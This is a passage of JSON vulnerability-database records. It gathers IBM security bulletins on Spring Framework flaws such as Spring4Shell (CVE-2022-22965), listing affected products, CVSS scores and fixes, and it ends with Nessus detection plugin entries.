"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22060", "CVE-2022-22950", "CVE-2022-22965"], "modified": "2022-04-22T11:43:07", "id": "F426BDEEA0109CBE44C73C53461CE7144BDD04ADCF7EC044CE76723EAE672095", "href": "https://www.ibm.com/support/pages/node/6573715", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:32:09", "description": "## Summary\n\nThere are multiple vulnerabilities in Spring Framework (CVE-2022-22968, CVE-2022-22965, and CVE-2022-22950) as described in the vulnerability details section. Spring Framework v5.3.8 is used by Db2 Web Query for i for infrastructure support. IBM has addressed the vulnerabilities in Db2 Web Query for i by upgrading to Spring Framework v5.3.19. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22968](<https://vulners.com/cve/CVE-2022-22968>) \n** DESCRIPTION: **Spring Framework could provide weaker than expected security, caused by a data binding rules vulnerability in which the patterns for disallowedFields on a DataBinder are case sensitive. The case sensitivity allows that a field is insufficiently protected unless it is listed with both upper and lower case for the first character of the field. An attacker could exploit this vulnerability to launch further attacks on the system. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/224374](<https://exchange.xforce.ibmcloud.com/vulnerabilities/224374>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Db2 Web Query for i| 2.3.0 \nIBM Db2 Web Query for i| 2.2.1 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now.**\n\nDb2 Web Query for i releases 2.2.1 and 2.3.0 are impacted. \n\n**Release 2.2.1 can be fixed by upgrading to release 2.3.0.**\n\nTo request an EZ-Install package, including instructions for the upgrade installation, send an email to QU2@us.ibm.com. More information for the upgrade is available at <https://ibm.biz/db2wq-install>. \n\n**Release 2.3.0 can be fixed by applying the latest Db2 Web Query for i group Program Temporary Fix (PTF).**\n\nThe PTFs are applied to product ID 5733WQX. The group PTF numbers and minimum level with the fix are:\n\n**Affected Releases**\n\n| \n\n**Group PTF and Minimum Level for Remediation** \n \n---|--- \n \nDb2 Web Query for i 2.3.0 w/ IBM i 7.5\n\n| \n\n[SF99671 level 6](<https://www.ibm.com/support/fixcentral/ibmi/quickorder?function=IBMiFixId&fixids=SF99671&includeSupersedes=0&source=fc> \"SF99671 level 6\" ) \n \nDb2 Web Query for i 2.3.0 w/ IBM i 7.4\n\n| \n\n[SF99654 level 6](<https://www.ibm.com/support/fixcentral/ibmi/quickorder?function=IBMiFixId&fixids=SF99654&includeSupersedes=0&source=fc>) \n \nDb2 Web Query for i 2.3.0 w/ IBM i 7.3\n\n| \n\n[SF99533 level 6](<https://www.ibm.com/support/fixcentral/ibmi/quickorder?function=IBMiFixId&fixids=SF99533&includeSupersedes=0&source=fc>) \n \n_**Important note:** \n__IBM recommends that all users running unsupported versions of affected products upgrade to supported and fixed version of affected products._\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T05:17:19", "type": "ibm", "title": "Security Bulletin: Due to use of Spring Framework, IBM Db2 Web Query for i is vulnerable to unprotected fields (CVE-2022-22968), remote code execution (CVE-2022-22965), and denial of service (CVE-2022-22950).", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22965", "CVE-2022-22968"], "modified": "2022-06-10T05:17:19", "id": "2FB703AAD3FC5C2BE7EED7EC7E69FEBE209E6C70177FEA76C552605DF83D85ED", "href": "https://www.ibm.com/support/pages/node/6593861", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:34:09", "description": "## Summary\n\nIBM Watson Discovery for IBM Cloud Pak for Data is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring is used for internal services. The fix includes Spring 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22963](<https://vulners.com/cve/CVE-2022-22963>) \n** DESCRIPTION: **VMware Spring Cloud Function could allow a remote attacker to execute arbitrary code on the system, caused by an error when using the routing functionality. By providing a specially crafted SpEL as a routing-expression, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223020](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223020>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nWatson Discovery| 4.0.0-4.0.7 \nWatson Discovery| 2.0.0-2.2.1 \n \n\n\n## Remediation/Fixes\n\nUpgrade to IBM Watson Discovery 4.0.8 \n\nUpgrade to IBM Watson Discovery 2.2.1 and apply cpd-watson-discovery-2.2.1-patch-10\n\n<https://cloud.ibm.com/docs/discovery-data?topic=discovery-data-install>\n\n<https://www.ibm.com/support/pages/available-patches-watson-discovery-ibm-cloud-pak-data>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T14:54:28", "type": "ibm", "title": "Security Bulletin: IBM Watson Discovery for IBM Cloud Pak for Data is affected by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-27T14:54:28", "id": "370CF55655D0DCE5B827E549AA74D877B1D4BA2D531AAEFFDF0A6CA27218326F", "href": "https://www.ibm.com/support/pages/node/6570949", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:32:43", "description": "## Summary\n\nThere are multiple vulnerabilities in Spring Framework used by SPSS Collaboration and Deployment Services. SPSS Collaboration and Deployment Services is affected but not classified as vulnerable to these issues. The fix includes Spring 5.3.20.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22970](<https://vulners.com/cve/CVE-2022-22970>) \n** DESCRIPTION: **Vmware Tanzu Spring Framework is vulnerable to a denial of service, caused by a flaw in the handling of file uploads. By sending a specially-crafted request, a remote authenticated attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/226491](<https://exchange.xforce.ibmcloud.com/vulnerabilities/226491>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2022-22968](<https://vulners.com/cve/CVE-2022-22968>) \n** DESCRIPTION: **Spring Framework could provide weaker than expected security, caused by a data binding rules vulnerability in which the patterns for disallowedFields on a DataBinder are case sensitive. The case sensitivity allows that a field is insufficiently protected unless it is listed with both upper and lower case for the first character of the field. An attacker could exploit this vulnerability to launch further attacks on the system. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/224374](<https://exchange.xforce.ibmcloud.com/vulnerabilities/224374>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-22971](<https://vulners.com/cve/CVE-2022-22971>) \n** DESCRIPTION: **Vmware Tanzu Spring Framework is vulnerable to a denial of service, caused by a flaw with a STOMP over WebSocket endpoint. By sending a specially-crafted request, a remote authenticated attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/226492](<https://exchange.xforce.ibmcloud.com/vulnerabilities/226492>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nSPSS Collaboration and Deployment Services| 8.3 \nSPSS Collaboration and Deployment Services| 8.2.2 \nSPSS Collaboration and Deployment Services| 8.2.1 \nSPSS Collaboration and Deployment Services| 8.2 \nSPSS Collaboration and Deployment Services| 8.1.1 \nSPSS Collaboration and Deployment Services| 8.1 \nSPSS Collaboration and Deployment Services| 8.0 \n \n\n\n## Remediation/Fixes\n\nProduct | VRMF| Remediation/First Fix \n---|---|--- \nSPSS Collaboration and Deployment Services| 8.3.0.0| [8.3.0.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FSPSS+Collaboration+and+Deployment+Services&fixids=8.3.0.0-IM-SCaDS-IF008&source=SAR> \"8.3.0.0\" ) \nSPSS Collaboration and Deployment Services| 8.2.2.0| [8.2.2.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FSPSS+Collaboration+and+Deployment+Services&fixids=8.2.2.0-IM-SCaDS-IF009&source=SAR> \"8.2.2.0\" ) \nSPSS Collaboration and Deployment Services| 8.2.1.0| [8.2.1.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FSPSS+Collaboration+and+Deployment+Services&fixids=8.2.1.0-IM-SCaDS-IF007&source=SAR> \"8.2.1.0\" ) \nSPSS Collaboration and Deployment Services| 8.2.0.0| [8.2.0.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FSPSS+Collaboration+and+Deployment+Services&fixids=8.2.0.0-IM-SCaDS-IF007&source=SAR> \"8.2.0.0\" ) \nSPSS Collaboration and Deployment Services| 8.1.1.0 \n| [8.1.1.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FSPSS+Collaboration+and+Deployment+Services&fixids=8.1.1.0-IM-SCaDS-IF008&source=SAR> \"8.1.1.0\" ) \nSPSS Collaboration and Deployment Services| 8.1.0.0 \n| [8.1.0.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FSPSS+Collaboration+and+Deployment+Services&fixids=8.1.0.0-IM-SCaDS-IF009&source=SAR> \"8.1.0.0\" ) \nSPSS Collaboration and Deployment Services| 8.0.0.0 \n| [8.0.0.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FSPSS+Collaboration+and+Deployment+Services&fixids=8.0.0.0-IM-SCaDS-IF009&source=SAR> \"8.0.0.0\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-30T14:20:34", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Spring Framework affect SPSS Collaboration and Deployment Services", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22965", "CVE-2022-22968", "CVE-2022-22970", "CVE-2022-22971"], "modified": "2022-05-30T14:20:34", "id": "C602AE40F6974D4EE4D596F81D007D4F74282F20DC8B4859AE08925E2CE79326", "href": "https://www.ibm.com/support/pages/node/6590869", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:32:19", "description": "## Summary\n\nVulnerabilities contained within 3rd party components were identified and remediated in the IBM MaaS360 Cloud Extender Agent, Mobile Enterprise Gateway and MaaS360 VPN module.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-22060](<https://vulners.com/cve/CVE-2021-22060>) \n** DESCRIPTION: **VMware Tanzu Spring Framework could allow a remote authenticated attacker to bypass security restrictions, caused by improper input validation. By sending a specially-crafted request, an attacker could exploit this vulnerability to insert additional log entries. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217183>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L) \n \n** CVEID: **[CVE-2022-0547](<https://vulners.com/cve/CVE-2022-0547>) \n** DESCRIPTION: **OpenVPN could allow a remote attacker to bypass security restrictions, caused by an authentication bypass vulnerability in external authentication plug-ins. By sending a specially-crafted request using multiple deferred authentication replies, an attacker could exploit this vulnerability to gain access with only partially correct credentials. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/222201](<https://exchange.xforce.ibmcloud.com/vulnerabilities/222201>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N) \n \n** CVEID: **[CVE-2022-0778](<https://vulners.com/cve/CVE-2022-0778>) \n** DESCRIPTION: **OpenSSL is vulnerable to a denial of service, caused by a flaw in the BN_mod_sqrt() function when parsing certificates. By using a specially-crafted certificate with invalid explicit curve parameters, a remote attacker could exploit this vulnerability to cause an infinite loop, and results in a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/221911](<https://exchange.xforce.ibmcloud.com/vulnerabilities/221911>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**\n\n| \n\n**Version(s)** \n \n---|--- \n \nIBM MaaS360 VPN Module\n\n| \n\n2.106.100 and prior \n \nIBM MaaS360 Mobile Enterprise Gateway\n\n| \n\n2.106.200 and prior \n \nIBM MaaS360 Cloud Extender Agent\n\n| \n\n2.106.100.008 and prior \n \n \n\n\n## Remediation/Fixes\n\nIBM encourages customers to update their systems promptly. \n\n1\\. Update the IBM MaaS360 Mobile Enterprise Gateway and the MaaS360 VPN Module to version 2.106.500 or higher. Instructions on how to upgrade the Mobile Enterprise Gateway and VPN Module is located on this IBM Documentation [page](<https://www.ibm.com/docs/en/maas360?topic=ice-upgrading-mobile-enterprise-gateway-meg-maas360-vpn-modules> \"page\" ).\n\n2\\. Update the IBM MaaS360 Cloud Extender to version 2.106.500.011 or greater. The latest Cloud Extender agent is available within the MaaS360 Administrator Portal. Instructions to upgrade the Agent is located on this IBM Documentation [page](<https://www.ibm.com/docs/en/maas360?topic=extender-upgrading-cloud> \"page\" ).\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-06T18:27:01", "type": "ibm", "title": "Security Bulletin: IBM MaaS360 Cloud Extender Agent, Mobile Enterprise Gateway and VPN module have multiple vulnerabilities (CVE-2021-22060, CVE-2022-22950, CVE-2022-0547, CVE-2022-0778, CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22060", "CVE-2022-0547", "CVE-2022-0778", "CVE-2022-22950", "CVE-2022-22965"], "modified": "2022-06-06T18:27:01", "id": "14108283F9157C4F2A38313CFBD3F47CFDC207CBE84809E04B7E197DA546B8D3", "href": "https://www.ibm.com/support/pages/node/6592807", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-09-27T15:18:38", "description": "The remote host contains a Spring Framework library version that is prior to 5.2.20 or 5.3.x prior to 5.3.18. It is, therefore, affected by a remote code execution vulnerability:\n - A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n - These are the prerequisites for the exploit:\n - JDK 9 or higher\n - Apache Tomcat as the Servlet container\n - Packaged as WAR\n - spring-webmvc or spring-webflux dependency", "cvss3": {}, "published": "2022-04-06T00:00:00", "type": "nessus", "title": "Spring Framework Spring4Shell (CVE-2022-22965)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-25T00:00:00", "cpe": ["cpe:/a:pivotal_software:spring_framework", "cpe:/a:vmware:spring_framework"], "id": "SPRING4SHELL.NBIN", "href": "https://www.tenable.com/plugins/nessus/159542", "sourceData": "Binary data spring4shell.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-03T19:12:05", "description": "The version of tomcat installed on the remote host is prior to 9.0.65-1. It is, therefore, affected by a vulnerability as referenced in the ALAS2TOMCAT9-2023-004 advisory.\n\n - A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. (CVE-2022-22965)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-09-27T00:00:00", "type": "nessus", "title": "Amazon Linux 2 : tomcat (ALASTOMCAT9-2023-004)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-28T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:tomcat", "p-cpe:/a:amazon:linux:tomcat-admin-webapps", "p-cpe:/a:amazon:linux:tomcat-docs-webapp", "p-cpe:/a:amazon:linux:tomcat-el-3.0-api", "p-cpe:/a:amazon:linux:tomcat-jsp-2.3-api", "p-cpe:/a:amazon:linux:tomcat-jsvc", "p-cpe:/a:amazon:linux:tomcat-lib", "p-cpe:/a:amazon:linux:tomcat-servlet-4.0-api", "p-cpe:/a:amazon:linux:tomcat-webapps", "cpe:/o:amazon:linux:2"], "id": "AL2_ALASTOMCAT9-2023-004.NASL", "href": "https://www.tenable.com/plugins/nessus/182056", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALASTOMCAT9-2023-004.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(182056);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/28\");\n\n script_cve_id(\"CVE-2022-22965\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/25\");\n\n script_name(english:\"Amazon Linux 2 : tomcat (ALASTOMCAT9-2023-004)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of tomcat installed on the remote host is prior to 9.0.65-1. It is, therefore, affected by a vulnerability\nas referenced in the ALAS2TOMCAT9-2023-004 advisory.\n\n - A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution\n (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR\n deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not\n vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be\n other ways to exploit it. (CVE-2022-22965)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2/ALASTOMCAT9-2023-004.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-22965.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/faqs.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update tomcat' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n 